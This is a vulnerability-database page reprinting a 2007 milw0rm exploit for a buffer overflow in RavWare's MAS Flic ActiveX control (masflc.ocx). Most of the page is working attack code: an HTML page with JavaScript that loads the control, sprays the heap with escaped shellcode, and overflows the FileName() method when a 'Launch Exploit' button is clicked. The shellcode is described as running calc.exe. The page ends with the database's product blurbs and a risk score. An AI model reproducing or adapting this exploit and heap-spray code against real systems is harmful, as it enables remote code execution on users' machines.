Vulners
Lucene search
RavWare Software - '.MAS' Flic Control Remote Buffer Overflow
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------
<b>RavWare Software MAS Flic Control "FileName()" method Buffer Overflow</b>
url: https://www.ravware.com/
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
File name: masflc.ocx
Version: 1.0.0.1
<b>Remote execution depends on Internet Explorer settings</b>
<b><font color='red'>This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.</font></b>
Tested on Windows XP Professional SP2 all patched, with Internet
Explorer 7
<b><font color='red'>This exploits executes calc.exe</font></b>
Heap Spray Technique was developed by SkyLined
(http://www.edup.tudelft.nl/~bjwever/advisory_iframe.html.php)
-----------------------------------------------------------------------
<object id=boom classid="clsid:481BB652-0766-11D2-9830-444553540000" style="width: 100px; height: 45px"></object>
<input language=JavaScript onclick=tryMe() type=button value="Launch Exploit">
<script>
var shellcode = unescape( "%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
"%u652E%u6578%u9000");
var spraySlide = unescape("%u9090%u9090");
var heapSprayToAddress = 0x0c0c0c0c;
function tryMe()
{
var size_buff = 4200;
var x = unescape("%0c%0c%0c%0c");
while (x.length<size_buff) x += x;
x = x.substring(0,size_buff);
boom.FileName = (x);
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return (spraySlide);
}
var heapBlockSize = 0x400000;
var SizeOfHeapDataMoreover = 0x5;
var payLoadSize = (shellcode.length * 2);
var spraySlideSize = heapBlockSize - (payLoadSize + SizeOfHeapDataMoreover);
var heapBlocks = (heapSprayToAddress+heapBlockSize)/heapBlockSize;
var memory = new Array();
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + shellcode;
}
</script>
</span></span>
</code></pre>
# milw0rm.com [2007-12-18]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Dec 2007 00:00Current
7.4High risk
Vulners AI Score7.4